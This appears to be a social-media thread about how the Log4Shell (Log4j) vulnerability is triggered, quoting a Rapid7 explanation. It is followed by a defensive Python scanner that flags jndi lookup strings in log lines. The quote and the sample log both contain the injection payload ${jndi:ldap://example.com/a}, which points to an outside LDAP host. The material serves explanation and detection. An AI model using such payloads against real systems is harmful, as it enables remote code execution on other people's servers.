@TheGibson @rysiek I'm confused by the description, which makes it seem that you would have to run a configuration with LDAP lookup in active use.
From the screenshots in that github repo it seems it's possible to inject an arbitrary LDAP lookup configuration pointing to an attacker-controlled server into any input field that sends unsanitized data into log4j though?

@TheGibson @rysiek Answering myself: It's the latter.

rapid7.com/blog/post/2021/12/1

"The vulnerability resides in the way specially crafted log messages were handled by the Log4j processor. Untrusted strings (e.g. those coming from input text fields, such as web application search boxes) containing content like ${jndi:ldap://example.com/a} would trigger a remote class load, message lookup, and execution of the associated content if message lookup substitution was enabled."
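To make the mechanism in that quote concrete from the detection side, here is a small scanner, added as an example (not code from this thread or from Rapid7), that finds `${prefix:body}` lookup expressions in text and flags the ones whose prefix is `jndi`, the kind of string that would be submitted to an input field and reach the logger. The regular expression is a deliberate simplification of Log4j's own lookup syntax, and the access-log lines are constructed for the example.

```python
import re

# Simplified Log4j-style lookup expression: ${prefix:body}.
# This is an approximation for detection, not Log4j's own parser.
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z0-9_-]+)\s*:([^}]*)\}")


def find_lookups(text):
    """Return (prefix, body) pairs for every ${prefix:body} expression in text.

    Prefixes are lower-cased so that mixed-case variants compare equal.
    """
    return [(m.group(1).lower(), m.group(2).strip()) for m in LOOKUP_RE.finditer(text)]


def has_jndi_lookup(text):
    """True if the text contains a lookup with the 'jndi' prefix, whatever the URL scheme."""
    return any(prefix == "jndi" for prefix, _ in find_lookups(text))


def scan_log(lines):
    """Return (line_number, lookup_body) for each jndi lookup found in a list of log lines."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for prefix, body in find_lookups(line):
            if prefix == "jndi":
                hits.append((line_no, body))
    return hits


# Constructed sample access-log lines (not real traffic). Line 2 carries the
# lookup string quoted in the thread inside a search-box parameter; line 3 has
# a non-jndi lookup and line 4 a template placeholder, neither of which should fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:00:01 +0000] "GET /search?q=laptop HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2021:08:00:02 +0000] "GET /search?q=${jndi:ldap://example.com/a} HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Dec/2021:08:00:03 +0000] "GET /search?q=${date:HH:mm} HTTP/1.1" 200 512',
    '10.0.0.8 - - [10/Dec/2021:08:00:04 +0000] "GET /item?name={{price}} HTTP/1.1" 404 128',
]

if __name__ == "__main__":
    for line_no, body in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup -> {body}")
```

Running it against the sample prints one hit for line 2. The scanner is only a triage aid: a match in a request log tells you that a lookup string arrived, not whether the application's logger had message lookup substitution enabled, which is the condition the Rapid7 text names for the remote class load.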
